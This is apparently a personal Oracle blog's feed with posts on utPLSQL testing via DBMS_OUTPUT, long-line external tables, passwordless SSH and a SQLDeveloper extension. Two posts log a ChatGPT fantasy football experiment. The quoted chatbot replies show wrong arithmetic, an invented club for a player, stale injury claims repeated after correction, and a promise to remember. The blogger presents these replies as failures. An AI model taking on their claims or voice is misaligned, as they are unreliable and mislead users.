The Anti-Kyte

Oracle - for when it was like that when you got there

Using DBMS_OUTPUT in utPLSQL tests for procedures that don’t perform DML

Mon, 2025-09-08 01:30

This post explores how you can unit test PL/SQL procedures that do not write to the database (other than the log table) by capturing dbms_output statements for use in a utPLSQL expectation.

But first, a news flash

Steven Feuerstein recommends using Skippy !

Sort of.

Well, not in so many words.
In fact, it’s unlikely that he’s aware of the little known Kangaroo aptitude for PL/SQL logging.
What he actually says is “Never put calls to DBMS_OUTPUT.PUT_LINE in your application code” …which initially put a crimp in my day as dbms_output is pretty central to the topic I want to cover here.
If you read the article further, however, he does conclude that (my emphasis):

“The bottom line is that any high quality piece of code should and will include instrumentation/tracing. Moving code into production without this ability leaves you blind when users have problems. So you definitely want to keep that tracing in, but you definitely do not want to use DBMS_OUTPUT.PUT_LINE – or at least rely only on the built-in to get the job done.”

This is where Skippy comes in as it allows you to send log messages to the screen, as well as recording them in the logging table.

So, what follows is :

  • a quick recap of how to use the dbms_output buffer to store and retrieve messages without recourse to the SQL*Plus set serveroutput command
  • how to incorporate this into a utPLSQL test
  • how Skippy can save you having to add dbms_output calls directly into your code

But first…

The Problem

I have a PL/SQL procedure that takes an input parameter then does something outside of the database.
Maybe it sends an email, or starts a scheduler job in a different session.
What it doesn’t do is change any data.
Also, it doesn’t return any value.
This makes it difficult to write an automated unit test for.

In this context, the purposes of the unit tests are :

  • to make sure that the procedure provides the expected output for a given input
  • to be runnable automatically ( usually as part of a suite of unit tests)

The code we’ll be testing looks like this :

create or replace procedure never_say_never( i_golden_rule in varchar2)
is
begin
    dbms_output.put_line('Validating input');
    if i_golden_rule is null then
        raise_application_error(-20910, 'Must have a golden rule !');
    end if;

    if length(i_golden_rule) > 75 then
        raise_application_error(-20920, 'Golden rule must be more pithy !');
    end if;
    
    dbms_output.put_line('Input is valid. Processing...');
    dbms_output.put_line('Rule One - '||i_golden_rule);
    --
    -- Do something non-databasey here - send an email, start a scheduler job to run a shell script,
    -- print the golden rule on a tea-towel etc...
    --
    dbms_output.put_line('Rule Two - there are exceptions to EVERY rule');
end;
/

When we run it :

clear screen
set serverout on size unlimited
exec never_say_never('Never put calls to DBMS_OUTPUT.PUT_LINE in your application code');

We get :

Validating input
Input is valid. Processing...
Rule One - Never put calls to DBMS_OUTPUT.PUT_LINE in your application code
Rule Two - there are exceptions to EVERY rule

Our unit tests for this code will check that :

  • if we do not specify a parameter value we will get ORA-20910
  • if we specify a parameter value longer than 75 we will get ORA-20920
  • if we specify a valid parameter, the last output message should be “Rule Two - there are exceptions to EVERY rule”.

For the last of those tests, we need to capture the last message in a variable in PL/SQL.

DBMS_OUTPUT buffering and retrieving messages

Here’s a simple example of using dbms_output to buffer a message and then read it into a variable :

declare
    v_status integer;
    v_message varchar2(32767);
begin
    dbms_output.enable;
    dbms_output.put_line('This is going to the buffer');
    dbms_output.get_line( v_message, v_status);
    if v_status = 1 then
        dbms_output.put_line('No lines in the buffer');
    else
        dbms_output.put_line('Message in buffer : '||v_message);
    end if;
end;
/

When we run this, we get :

Message in buffer : This is going to the buffer


PL/SQL procedure successfully completed.

There are quite a few examples of the get_line procedure in action, but fewer of its plural sibling – get_lines – so…

clear screen

-- Flush the buffer so we don't pick up any stray messages from earlier in the session
exec dbms_output.disable; 

declare
    v_status integer;
    v_messages dbmsoutput_linesarray;
begin
    -- Enable the buffer
    dbms_output.enable;

    -- Put some messages into the buffer
    -- dbms_output.put_line('Enabled');
    for i in 1..5 loop
        dbms_output.put_line('Message '||i);
    end loop;
    
    -- Retrieve all of the messages in a single call
    dbms_output.get_lines( v_messages, v_status);
    
    -- the count of messages is one more than the actual number of messages
    -- in the buffer !
    dbms_output.put_line('Message array elements = '||v_messages.count);
    
    for j in 1..v_messages.count - 1 loop
    
        -- Output the messages retrieved from the buffer
        dbms_output.put_line(v_messages(j)||' read from buffer');
    end loop;
    dbms_output.put_line(q'[That's all folks !]');
end;
/

Running this produces the following output :



PL/SQL procedure successfully completed.

Message array elements = 6
Message 1 read from buffer
Message 2 read from buffer
Message 3 read from buffer
Message 4 read from buffer
Message 5 read from buffer
That's all folks !


PL/SQL procedure successfully completed.

Incidentally, if your code does contain dbms_output statements that, in hindsight, you would really like to have written to your persistent log, then the dbms_output.get% procedures offer a way of doing this without necessarily having to change the original code.
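For instance, here’s a minimal sketch of that idea. Note that my_log is a made-up table name for this example – substitute whatever persistent logging table or API you actually use :

declare
    v_messages dbmsoutput_linesarray;
    v_status integer;
begin
    dbms_output.enable;

    -- the original, unmodified code still writes its messages via dbms_output.put_line
    never_say_never('I am never wrong');

    -- drain the buffer and persist each message
    dbms_output.get_lines( v_messages, v_status);
    for i in 1..v_messages.count loop
        if v_messages(i) is not null then
            -- my_log is a hypothetical table - use your own logging table/API here
            insert into my_log( logged_at, message)
            values( systimestamp, v_messages(i));
        end if;
    end loop;
    commit;
end;
/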

The utPLSQL Unit Tests

Now let’s take a look at the unit tests.
For the test that runs without error we’re going to get the last message from the buffer and check that it’s the one we expect.
The utPLSQL Unit Test package is :

create or replace package never_say_never_ut
as

    --%suite(Words of Wisdom)
     
    --%test( no parameter value)
    procedure no_parameter_value;
    
    --%test( parameter_too_long)
    procedure parameter_too_long;
    
    --%test( valid parameter)
    procedure valid_parameter;
end;
/
create or replace package body never_say_never_ut
as

    -- no parameter value
    procedure no_parameter_value
    is
    begin
        never_say_never(null);
        ut.fail('Expected ORA-20910 but no error raised');
    exception when others then
        ut.expect(sqlcode).to_equal(-20910);
    end;    
        
    
    -- parameter_too_long
    procedure parameter_too_long
    is
    begin
        never_say_never('you definitely do not want to ... rely only on the built-in to get the job done');
        ut.fail('Expected ORA-20920 but no error raised');
    exception when others then
        ut.expect(sqlcode).to_equal(-20920);
    end;
    
    -- valid parameter
    procedure valid_parameter
    is
        c_expected constant varchar2(75) := 'Rule Two - there are exceptions to EVERY rule';
        v_messages dbmsoutput_linesarray;
        v_status number;
    begin
        -- Setup
       
        -- flush the buffer
        dbms_output.disable;
        -- enable the buffer
        dbms_output.enable;
        
        -- Execute
        never_say_never('I am never wrong');        
        
        -- Validate
        dbms_output.get_lines(v_messages, v_status);
        
        ut.expect(v_messages(v_messages.count - 1)).to_equal(c_expected);
    exception when others then
        ut.fail(sqlerrm);
    end;
end;
/

Running this, we can see that the procedure passes all the tests :

exec dbms_session.modify_package_state( dbms_session.reinitialize);
set serveroutput on size unlimited
clear screen
exec ut.run('never_say_never_ut');

Words of Wisdom
no parameter value [.002 sec]
Validating input
parameter_too_long [.002 sec]
Validating input
valid parameter [.001 sec]

Finished in .008736 seconds
3 tests, 0 failed, 0 errored, 0 disabled, 0 warning(s)


PL/SQL procedure successfully completed.

That said, Steven does have a point. Of course, there may be circumstances where you want your code peppered with dbms_output statements so you can see what’s happening when running interactively, but where you don’t necessarily want them clogging up your logging table. However, if you can do your diagnosis using the log messages themselves, then it might be handy to see them output to the screen at runtime as well as having them written to the log table…

What’s that Skippy ?

Skippy provides the ability to send log messages to dbms_output as well as the log table. For example :

create or replace procedure never_say_never( i_golden_rule in varchar2)
is
begin
    skippy.set_msg_group('WORDS_OF_WISDOM');
    skippy.log('Validating input');
    if i_golden_rule is null then
        raise_application_error(-20910, 'Must have a golden rule !');
    end if;

    if length(i_golden_rule) > 75 then
        raise_application_error(-20920, 'Golden rule must be more pithy !');
    end if;
    
    skippy.log('Input is valid. Processing...');
    skippy.log('Rule One - '||i_golden_rule);
    --
    -- Do something non-databasey here - send an email, start a scheduler job to run a shell script,
    -- print the golden rule on a tea-towel etc...
    --
    skippy.log('Rule Two - there are exceptions to EVERY rule');
exception when others then 
    skippy.err;
    raise;
end;
/

If we run this as usual…

exec never_say_never('Never use a DML trigger');

… we have to go to the logging table to find the output…

Given that the logging table is likely to be used across the application, finding the exact messages you’ve generated might not be straightforward.
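One way to narrow things down is to filter on the message group set at the top of the procedure. Purely as an illustrative sketch – I’m assuming a log view called skippy_logs with message_group, log_ts and message columns, which may well not be the names Skippy actually uses :

select log_ts, message
from skippy_logs                          -- assumed view/table name
where message_group = 'WORDS_OF_WISDOM'   -- set via skippy.set_msg_group in the procedure
order by log_ts
/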

Fortunately, we can also output the messages to the screen as follows :

set serverout on size unlimited
exec skippy.enable_output;
exec never_say_never('Australia win Ashes series at home');
exec skippy.disable_output;

PL/SQL procedure successfully completed.

Validating input
Input is valid. Processing...
Rule One - Australia win Ashes series at home
Rule Two - there are exceptions to EVERY rule

Because we’re using Skippy, we don’t need any dbms_output statements in our procedure in order to test it in the same way as before. We just update the valid_parameter test to be :

...
procedure valid_parameter
is
    c_expected constant varchar2(75) := 'Rule Two - there are exceptions to EVERY rule';
    v_messages dbmsoutput_linesarray;
    v_status number;
begin
    -- Setup

    -- flush the buffer
    dbms_output.disable;
    -- enable the buffer
    dbms_output.enable;
    -- Turn on logging output
    skippy.enable_output;

    -- Execute
    never_say_never('I am never wrong');        

    -- Validate
    dbms_output.get_lines(v_messages, v_status);

    ut.expect(v_messages(v_messages.count - 1)).to_equal(c_expected);

    -- Teardown
    skippy.disable_output;

exception when others then
    ut.fail(sqlerrm);
end;
...

So, even when it comes to testing, Skippy will “never” let you down !

Environment used for these examples

These examples were run on an Oracle OCI Free Tier database running Oracle 19c.

Both of the frameworks used in this post are open source.

The Gafferbot Supremacy – why a Goldfish Memory and inability to count are no barrier to Fantasy Football Success

Mon, 2025-08-25 01:30

It’s time for an update on my season-long AI experiment involving ChatGPT (Gafferbot).

Gameweek1 (GW1) has now been completed.

Predictably, one of us has been left feeling as sick as parrot and the other is… in smug mode.
The league doesn’t lie…

Team Name                      Points
Artificial Idiot (Gafferbot)       57
Actual Idiot (Me)                  54

…but it doesn’t really tell the full story either.
Ironically, GafferBot’s early ascendancy can be ascribed in no small part to…er…human error. The full sorry tale will follow presently.
In the meantime, I’d like to take a look at some of the behavioural quirks exhibited by ChatGPT which have become a feature of my interactions with GafferBot so far…

Simple Maths

An acquaintance of mine, who also works in IT, recently commented to me that AI is to the Software Engineer what the calculator is to the Mathematician. From dealing with GafferBot over the last few weeks, I can say that AI could definitely do with a calculator.
For example, this is one of its squad suggestions :

I’ll pause here to give you time to check the maths. You may want to get a calculator…

Dear reader, if you do happen to have plugged a generative AI into your payroll system, now may be a good time to review that decision.

There are a number of articles explaining why generative AI has this issue ( although none of them mention it not having fingers to count on). Here’s what ChatGPT had to say for itself :

Me: “Why do you sometimes have problems with simple maths ?”

GafferBot : “That’s a fair question, Mike.

There are a few reasons why I can sometimes slip up on even simple maths:

I don’t actually “calculate” by default – I generate text based on patterns. If you ask me “what’s 27 × 43,” I might recall that multiplication fact from training data rather than working it out step by step. That can lead to mistakes.

Distraction by context – If a maths problem is wrapped in a long or tricky explanation, I might focus more on the surrounding words than the numbers themselves, which raises the chance of an error.

Ambiguity in how the problem is posed – If the maths question has multiple interpretations, I might pick the wrong one unless I slow down and clarify.

Shortcuts in reasoning – I sometimes “pattern-match” to an answer that looks right without properly checking it, especially if it’s a common-looking result.”

It continued :

“To avoid this, when accuracy matters I’ll:

explicitly show the calculation steps,

or use my built-in calculator tool to double-check.

Would you like me to always show my working whenever you ask me a maths question, so you can be confident I haven’t slipped?”

I have now asked it to use its built-in calculator tool. I’ll keep my own calculator handy, just in case.

Making stuff up

Another interesting characteristic of GafferBot is its tendency to just make stuff up.
For example, during one of our chats, it decided that Mo Salah was an Arsenal player.
As Salah has never played for Arsenal, this can be considered a clear case of incorrect, rather than out-of-date, information.
Apparently, in AI circles, this phenomenon is known as hallucination.

Repeating incorrect information

I’m not sure whether this next character defect is because GafferBot’s been reading about smoking something illegal, or whether it’s distinct from hallucination.

I really hope it isn’t Gafferbot gaslighting me into the human error I mentioned earlier, as the prospect of it playing mind games à la Alex Ferguson is a bit worrying.

The conversation went something like this :

Me : “We currently have Salah as captain and Haaland as Vice-Captain based on your recommendation from our previous conversations. Do you think this is OK, or should we change it ?”

GB : “Salah as captain and Haaland as vice-captain is still the best move for Gameweek 1”… “I can also check any last-minute rotation risk or fixture updates for GW1 to confirm they’re both guaranteed starters. Do you want me to do that ?”

Me : “yes please”

To which GafferBot responds :

Me : “Today is 14th August. Haaland was injured in March but is now fit.”

GB : “Ah, thanks for clarifying, Mike — that makes sense. Since today is 14th August, Erling Haaland is fully fit and ready for Gameweek 1.

So your original captaincy plan still stands:

  • Captain: Mohamed Salah (Liverpool)
  • Vice-Captain: Erling Haaland (Man City)

Both are expected starters with excellent scoring potential. No changes needed.”

A little later in the conversation…

GB : “If you want, I can also check all first-week fixtures and confirm the highest expected point haul for each starting player to double-check your Gameweek 1 choices. Do you want me to do that?”

ME : “yes please”

GafferBot then proceeded to repeat the assertion that Haaland was injured. The response it gave was, in fact, word-for-word the same as its original statement on this subject.

ME : “Once again, Haaland is not injured. That report was from March which was 5 months ago.”

GB : “Ah, thanks for confirming, Mike — that makes sense. Since today is 14th August, Haaland is fully fit and ready for Gameweek 1.

So your original captaincy plan remains the best choice:

  • Captain: Mohamed Salah (Liverpool)
  • Vice-Captain: Erling Haaland (Man City)

Both are expected starters with strong scoring potential.

We can now do a final points-potential check for all starting XI players based on their opening fixtures and attacking/defensive potential to ensure the 3‑5‑2 setup is optimal. Do you want me to do that?”

ME : “yes please”

At this point, Gafferbot repeated the Haaland injury story yet again.

ME : “Why do you keep telling me that Haaland is injured ? Your information is out of date. What is preventing you from remembering this ?”

GB : “Ah — I see exactly what’s happening, Mike. Thanks for pointing it out.

Here’s what’s going on:

  • I do not have live awareness of events in real time. When I try to access news about a player, I sometimes pull in stale sources or old reports if my search results include older articles.
  • In Haaland’s case, the March injury story keeps appearing in my search results, so I mistakenly flagged him as unavailable.
  • I don’t automatically retain updates from one search to the next, which is why I keep repeating outdated info unless you explicitly correct me — like you did just now.

The good news: now that you’ve confirmed today’s date and Haaland’s fitness, I can remember for the rest of this conversation that he is fully fit and ready for Gameweek 1.

If you like, I can give a final, fully corrected Gameweek 1 squad and captain/vice-captain summary, ignoring any old injury misinformation. Do you want me to do that?”

I wasn’t entirely convinced by that. Even after confirming today’s date and Haaland’s fitness, the AI had still repeated the out-of-date information regarding the injury.

The Human Touch

After this conversation I was sufficiently discombobulated to assign the captaincy to Haaland instead of Salah.

Whilst Salah scored 8 points in his match ( which would’ve been doubled to 16 if he were captain), Haaland did even better with 2 goals and a 13 point haul.
As Gafferbot’s Captain, that was doubled to 26 points, a net gain of 10 points due to my “assist”.

At times like this, the Fantasy Football Manager – like their real-life counterpart – tends to find refuge in the cliché.
So, I’m hoping that these things will even themselves out over the course of a season.
And remember, it’s a marathon, not a snickers ( something like that anyway).

Oracle External Tables and really really long lines

Wed, 2025-08-20 01:30

One of the things I like about External Tables is that you can use them to read a file on the Database Server OS without having to leave the comfort of the database itself.
Provided you have permissions on a Directory Object pointing to the appropriate directory, it’s a simple matter to create an external table that you can then point at an OS file.
Until recently, I never really thought about how this technique could work when it comes to reading lines longer than 4000 characters, but it turns out that there are a couple of ways this can be achieved, which is not to be sneezed at (ironically, given the examples that follow).

This odyssey all the way to the end of the line will encompass :

  • reading long fields – more than 4000 characters
  • reading really long fields and overcoming the default 512K record length limit
  • a look at the new(ish) ORACLE_BIGDATA driver for External Tables

Whilst this tale does have a happy (line) ending, you may want to bring some tissues…

A simple example

For this exercise, I’m running Oracle 19c (19.3) in vagrant.
I have a directory object called INCOMING_FILES on /u01/incoming_files, which contains some txt files.
Note that each file only contains a single line of data, so the file size is the size of that line :

The External Table I’m using to read files is :

create table view_file_xt
(
    line number,
    text varchar2(4000)
)
organization external
(
    type oracle_loader
    default directory incoming_files
    access parameters 
    (
        records delimited by newline
        nologfile
        nobadfile
        nodiscardfile
        fields terminated by '~'
        missing field values are null
        (
            line recnum,
            text char(4000)
        )
    ) 
    location('')
)
reject limit unlimited
/

Obviously, there’s no issue reading the smallest of the three files :

However if we want to open hayfever.txt ( 4.9K), we’re going to need to tweak our external table.

Beyond (about) 4K


Fortunately, the data types in the external table field specification are not the same as the SQL data types of the columns, which means we can do this :

drop table view_file_xt;

create table view_file_xt
(
    line number,
    text clob
)
organization external
(
    type oracle_loader
    default directory incoming_files
    access parameters 
    (
        records delimited by newline
        nologfile
        nobadfile
        nodiscardfile
        fields terminated by '~'
        missing field values are null
        (
                line recnum,
                text char(8000)
        )
    ) 
    location('')
)
reject limit unlimited
/

This allows us to read the larger value without any issues :

select line, text
from view_file_xt external modify( location( 'hayfever.txt'));

It’s a bit of a pain to print out the entire contents of text ( it’s just the letter ‘A’ 5000 times with “choo!” at the end), but using the external table to report the line length is enough to demonstrate that this change works :

select line, length(text)
from view_file_xt external modify( location( 'hayfever.txt'));

  LINE    LENGTH(TEXT) 
_______ _______________ 
      1            5005 

Getting a bit silly now

I’ll admit that this is something of an edge case but if, for example, you want to look at a “wide” CSV file to see why it’s not loading, then you may just conceivably need to accommodate a 2MB long line. Still, it shouldn’t be an issue – we just need to adjust the size of the text field specification, right ?

drop table view_file_xt;

create table view_file_xt
(
    line number,
    text clob
)
organization external
(
    type oracle_loader
    default directory incoming_files
    access parameters 
    (
        records delimited by newline
        nologfile
        nobadfile
        nodiscardfile
        fields terminated by '~'
        missing field values are null
        (
                line recnum,
                text char(2097152)
        )
    ) 
    location('')
)
reject limit unlimited
/

When we run the query against our 2MB file, we get an unpleasant surprise :

select length(text) from view_file_xt external modify( location('man_flu.txt'))
/


ORA-29913: error in executing ODCIEXTTABLEFETCH callout
ORA-29400: data cartridge error
KUP-04020: found record longer than buffer size supported, 524288, in /u01/incoming_files/man_flu.txt (offset=0) https://docs.oracle.com/error-help/db/ora-29913/
Either processing the specified data cartridge routine caused an error, or the implementation of the data cartridge routine returned the ODCI_ERROR return code
Error at Line: 1 Column: -1

It’s worth noting that the error is triggered if an entire record is larger than the stated size, irrespective of the size of individual columns that comprise the record.
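To illustrate the point, here’s a sketch using a variation on the table above, with the single text field split in two. The file name wide_line.txt and its contents are hypothetical – imagine a single ‘~’-delimited line of around 600,000 characters, split roughly evenly between the two fields. Each field fits comfortably within its char() specification, but because the record as a whole is longer than the default 512K buffer, we’d still expect the same KUP-04020 error :

create table two_field_xt
(
    first_bit clob,
    second_bit clob
)
organization external
(
    type oracle_loader
    default directory incoming_files
    access parameters 
    (
        records delimited by newline
        nologfile
        nobadfile
        nodiscardfile
        fields terminated by '~'
        missing field values are null
        (
            first_bit char(400000),
            second_bit char(400000)
        )
    ) 
    location('')
)
reject limit unlimited
/

-- wide_line.txt is a hypothetical ~600K-character single-line file
select length(first_bit), length(second_bit)
from two_field_xt external modify( location('wide_line.txt'))
/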

In order to get past this limit, we need to use one of the more obscure (to me, at least) external table parameters – readsize, an example of which Emanual Cifuentes has posted here.

With this tweak…

drop table view_file_xt;

create table view_file_xt
(
    line number,
    text clob
)
organization external
(
    type oracle_loader
    default directory incoming_files
    access parameters 
    (
        records delimited by newline
        readsize 2097152
        nologfile
        nobadfile
        nodiscardfile
        fields terminated by '~'
        missing field values are null
        (
            line recnum,
            text char(2097152)
        )
    ) 
    location('')
)
reject limit unlimited
/

…our query works :

select length(text) from view_file_xt external modify( location('man_flu.txt'))
/

  LENGTH(TEXT) 
_______________ 
        2000005 

The ORACLE_BIGDATA Access Driver

I’ve included this section because this is the first time I’ve encountered this external table type and I haven’t found a code example for it anywhere apart from the Oracle documentation itself.

That said, I’ll admit that it’s a less than ideal solution for the challenge at hand. So, for what it’s worth…

drop table view_file_xt;

create table view_file_xt
(
    text clob
)
    organization external(
        type oracle_bigdata
        default directory incoming_files
        access parameters 
        (
            com.oracle.bigdata.fileformat=textfile
            com.oracle.bigdata.blankasnull=true
            com.oracle.bigdata.csv.rowformat.fields.terminator='\n'
            com.oracle.bigdata.ignoreblanklines=true
            com.oracle.bigdata.buffersize=2048
        ) 
        location('')
    )
    reject limit unlimited
/

Note that the Buffer Size is specified in Kilobytes rather than bytes.
Perhaps a more pertinent difference here is that you can’t use the EXTERNAL MODIFY clause for this type of external table :

select length(text)
from view_file_xt external modify( location('man_flu.txt'))
/

ORA-30417: The EXTERNAL MODIFY clause cannot be used to modify the location for an ORACLE_BIGDATA external table. https://docs.oracle.com/error-help/db/ora-30417/
The EXTERNAL MODIFY clause was used to change the location for an ORACLE_BIGDATA external table
Error at Line: 2 Column: 5

Instead we have to point the External Table at the file the old-fashioned way…

alter table view_file_xt location('man_flu.txt');

select length(text)
from view_file_xt
/

LENGTH(TEXT)
------------
     2000005

What is the Maximum Buffer Size ?

The answer to this appears to be “it depends”.

The maximum size of a CLOB is 4GB. However, the maximum buffer size for an ORACLE_BIGDATA table appears to be 10240 KB ( 10 MB) :

create table view_file_xt
(
    text clob
)
    organization external(
        type oracle_bigdata
        default directory incoming_files
        access parameters 
        (
            com.oracle.bigdata.fileformat=textfile
            com.oracle.bigdata.blankasnull=true
            com.oracle.bigdata.csv.rowformat.fields.terminator='\n'
            com.oracle.bigdata.ignoreblanklines=true
            com.oracle.bigdata.buffersize=4194304
        ) 
        location('')
    )
    reject limit unlimited
/

alter table view_file_xt location('man_flu.txt');

select length(text)
from view_file_xt
/

ORA-29913: error in executing ODCIEXTTABLEOPEN callout
ORA-29400: data cartridge error
KUP-11530: value for com.oracle.bigdata.buffersize larger than maximum allowed value 10240 https://docs.oracle.com/error-help/db/ora-29913/
Either processing the specified data cartridge routine caused an error, or the implementation of the data cartridge routine returned the ODCI_ERROR return code
Error at Line: 1 Column: -1

By contrast, the trusty ORACLE_LOADER driver appears to be able to go much higher. I believe that the exact limit may be dependent on your environment ( and how much memory you want to hog to read a file the lazy way).

In this test environment, I managed to get up to around 500MB…

drop table view_file_xt;

create table view_file_xt
(
    line number,
    text clob
)
organization external
(
    type oracle_loader
    default directory incoming_files
    access parameters 
    (
        records delimited by newline
        readsize 524288000
        nologfile
        nobadfile
        nodiscardfile
        fields terminated by '~'
        missing field values are null
        (
            line recnum,
            text char(524288000)
        )
    ) 
    location('')
)
reject limit unlimited
/
select length(text)
from view_file_xt external modify ( location( 'man_flu.txt'))

LENGTH(TEXT)
------------
     2000005

When I tested 512MB (536870912) I got :

SQL Error: ORA-29913: error in executing ODCIEXTTABLEFETCH callout
ORA-29400: data cartridge error
KUP-04050: error while attempting to allocate 536870912 bytes of memory

References

The Oracle Docs are a veritable trove on the subject of External Tables.
The documentation of readsize is here .
There’s also a section on the ORACLE_BIGDATA Access Driver .

GafferBot – a journey into AI through the medium of Fantasy Football

Sun, 2025-08-03 07:57

The promise of 100% code generation – thus making Software Engineers obsolete – has been around for pretty much my entire career.
Right now, the tsunami of hype surrounding AI has encompassed this particular claim in the form of “Vibe Coding”.
Whenever this topic comes up on one of my social media feeds, I comfort myself by performing a little test.
I ask the AI on my phone to pick a Fantasy Football Team .

Recent results have led me to reflect that, whilst Harry Kane is a wonderful player, he’s not going to score many goals in the English Premier League whilst playing for Bayern Munich.
Also, picking 4 goalkeepers could be considered a bold strategy, as could selecting a team with only 10 players.

Whilst these AI pronouncements – made with the self-assurance ( and accuracy) of some bloke down the pub – are something of a comfort, I do feel a bit like a dinosaur, shouting at the meteorite that’s hurtling towards me.
Therefore, rather than sneering at it, I’ve decided to embark upon a journey toward understanding just what AI is capable of right now and how I might use it to best effect.
To this end, I’m going to ask ChatGPT to manage a squad throughout the course of the coming season.
I’ll be using the default chatbot here, not any specialised GPTs.

Fantasy Football would appear to be a good testing ground.
The parameters within which a squad must operate are clearly defined.
Additionally, the results are easily verifiable – something that’s quite important given AI’s sometimes equivocal relationship with facts.

When I asked it what it would like to be called in the context of this exercise, ChatGPT came up with the name “GafferBot”. Let’s face it, that could’ve been a whole lot worse ( although it may have considered that Apple TV have the copyright on “MurderBot” ).

I will be acting as Assistant Manager ( well, more of an Igor) to GafferBot’s team, which I have named – not without malice – “Artificial Idiot”.
Deb has assumed the role of General Manager in the hope that she can channel the most successful manager in English football right now – Sarina Wiegman.

As a control, I will be entering and managing my own squad – “Actual Idiot”.

It’s still a couple of weeks until the season starts but we have made a first attempt at picking a squad.
After some trial and error, GafferBot has settled on this lineup :

In the course of the ChatGPT squad selection session a couple of things became apparent.
GafferBot’s information was a bit out-of-date when it came to player values, and even what teams were competing in the EPL this season. It did make a couple of attempts to pick Luton Town players, for example, despite them having been relegated the season before last.
At one point, the proposed squad was over the maximum value allowed by £3.5 million, but the changes then proposed by GafferBot would have reduced the value by only £0.5m.
This appears to be symptomatic of ChatGPT’s sometimes tenuous grasp of basic arithmetic.
At the end of the session, I pointed GafferBot at some relevant links and asked it to remember them for future sessions. The links are :

We’ll need to revisit the squad ahead of the start of the season as players are still being transferred into and out of the league. It will be interesting to see if these links are now considered by GafferBot.
One indication of this will be to check that the values of any players mentioned by the AI are up-to-date.

I’m trying to keep a positive attitude toward the forthcoming season. If Artificial Idiot does somehow prevail in the Idiot derby, at least I’ll have someone to help me write my CV.

Passwordless connection to a Linux server using SSH

Tue, 2025-07-22 01:30

It seems that the 90s are back in fashion.
Not only are Oasis currently making headlines, but England’s Women have just won a penalty shootout which featured Lucy Bronze channelling 1996-vintage Stuart Pearce.
SSH also originates from the 90s, but unlike Britpop, has remained current ever since.
It will work on ( and comes as standard with) pretty much any Linux server.
Whilst I don’t happen to have a cluster of production servers attached to my home network, I do have a RaspberryPi running on Raspbian 11 (Bullseye), so I’ll be connecting to that from my Ubuntu laptop in the steps that follow…

Confirming Connectivity

On my laptop ( Ubuntu 24.04), I have an entry in /etc/hosts for the Pi to save me from having to remember the IP Address whenever I want to connect. To confirm that the Pi is available :

ping -c1 pithree.home

Now we need to confirm that SSH is present on both the client machine and the server we’re connecting to. We can do this by running :

ssh -V

On the Ubuntu client this returns:

OpenSSH_9.6p1 Ubuntu-3ubuntu13.12, OpenSSL 3.0.13 30 Jan 2024

…and on the Pi…

OpenSSH_7.4p1 Raspbian-10+deb9u7, OpenSSL 1.0.2u  20 Dec 2019

I can test the connection to the Pi ( connecting as the user “pi”) by running this from the client :

ssh pi@pithree.home

The first time you use SSH to connect to a server, you will be presented with a message like this :

Answering “yes” will add the server to the list of known hosts :

I will then be prompted for the password for the pi user that I’m connecting as.

Enter this correctly and we’re in :

Now we’ve confirmed that we can connect using SSH, we want to set things up so we can do it without needing to provide a password each time…

Configuring key-based Authentication

To use key-based authentication, we’ll need to generate an SSH Key Pair on the client machine. This will consist of a Public Key and a Private Key. We will then need to deploy our public key to the server.

To generate the key-pair :

ssh-keygen

In my case, I’ve left both the prompts for the filename and the passphrase blank :

As a result, two files have been created under the .ssh directory in the user I’m connected as :

cd $HOME/.ssh
ls -l id_ed25519*
-rw------- 1 mike mike 411 Jul 18 15:22 id_ed25519
-rw-r--r-- 1 mike mike 103 Jul 18 15:22 id_ed25519.pub

Note that the file without the extension holds the private key and the file with the .pub extension contains the public key.

To copy the public key to the target server, we’re going to make use of the tool ssh provides.

For this, we’ll need the path of the file holding the public key and the user and servername that we’re connecting to.

ssh-copy-id -i $HOME/.ssh/id_ed25519.pub pi@pithree.home

Once we’ve run this, we can connect to the server without being prompted for a password :

User Defined Extensions in SQLDeveloper Classic – something you can’t do in VSCode (yet)

Sun, 2025-06-01 06:16

I can tell you from personal experience that, when you reach a certain point in your life, you start looking for synonyms to use in place of “old”.
If you’re a venerable yet still useful Oracle IDE, for example, you may prefer the term “Classic”.
One thing SQLDeveloper Classic isn’t is obsolete. It still allows customisations that are not currently available in its shiny new successor – the SQLDeveloper extension for VSCode.
Fortunately, there’s no reason you can’t run both versions at the same time – unless your corporate IT has been overzealous and either packaged VSCode in an MSI that prohibits installation of extensions or has a policy preventing extensions running because “security”.
Either way, SQLDeveloper Classic is likely to be around for a while.
One particular area where Classic still has the edge over its shiny new successor is when it comes to user-defined extensions.
In this case – finding out the partition key and method of a table without having to wade through the DDL for that object…

Table Partitioning Meta Data

The following query should give us what we’re after – details of the partitioning and sub-partitioning methods used for a table, together with a list of the partition and (if applicable) sub-partition key columns :

with part_cols as
(
    select 
        owner,
        name,
        listagg(column_name, ', ') within group ( order by column_position) as partition_key_cols
    from all_part_key_columns
    group by owner, name
),
subpart_cols as
(
    select 
        owner,
        name,
        listagg(column_name, ', ') within group ( order by column_position) as subpartition_key_cols
    from all_subpart_key_columns
    group by owner, name
)
select 
    tab.owner, 
    tab.table_name, 
    tab.partitioning_type, 
    part.partition_key_cols,
    tab.subpartitioning_type,
    sp.subpartition_key_cols
from all_part_tables tab
inner join part_cols part    
    on part.owner = tab.owner 
    and part.name = tab.table_name 
left outer join subpart_cols sp 
    on sp.owner = tab.owner 
    and sp.name = tab.table_name
where tab.owner = 'SH'
and table_name = 'SALES'
order by 1,2
/

That’s quite a lot of code to type in – let alone remember – every time we want to check this metadata, so let’s just add an extra tab to the Table view in SQLDeveloper.

Using this query, I’ve created an xml file called table_partitioning.xml to add a tab called “Partition Keys” to the SQLDeveloper Tables view :

<items>
    <item type="editor" node="TableNode" vertical="true">
        <title><![CDATA[Partition Keys]]></title>
        <query>
            <sql>
                <![CDATA[
                    with part_cols as
                    (
                        select 
                            owner,
                            name,
                            listagg(column_name, ', ') within group ( order by column_position) as partition_key_cols
                        from all_part_key_columns
                        group by owner, name
                    ),
                    subpart_cols as
                    (
                        select 
                            owner,
                            name,
                            listagg(column_name, ', ') within group ( order by column_position) as subpartition_key_cols
                        from all_subpart_key_columns
                        group by owner, name
                    )
                    select 
                        tab.owner, 
                        tab.table_name, 
                        tab.partitioning_type, 
                        part.partition_key_cols,
                        tab.subpartitioning_type,
                        sp.subpartition_key_cols
                    from all_part_tables tab
                    inner join part_cols part    
                        on part.owner = tab.owner 
                        and part.name = tab.table_name 
                    left outer join subpart_cols sp 
                        on sp.owner = tab.owner 
                        and sp.name = tab.table_name
                    where tab.owner = :OBJECT_OWNER
                    and table_name = :OBJECT_NAME
                    order by 1,2
                ]]>
            </sql>
        </query>
    </item>
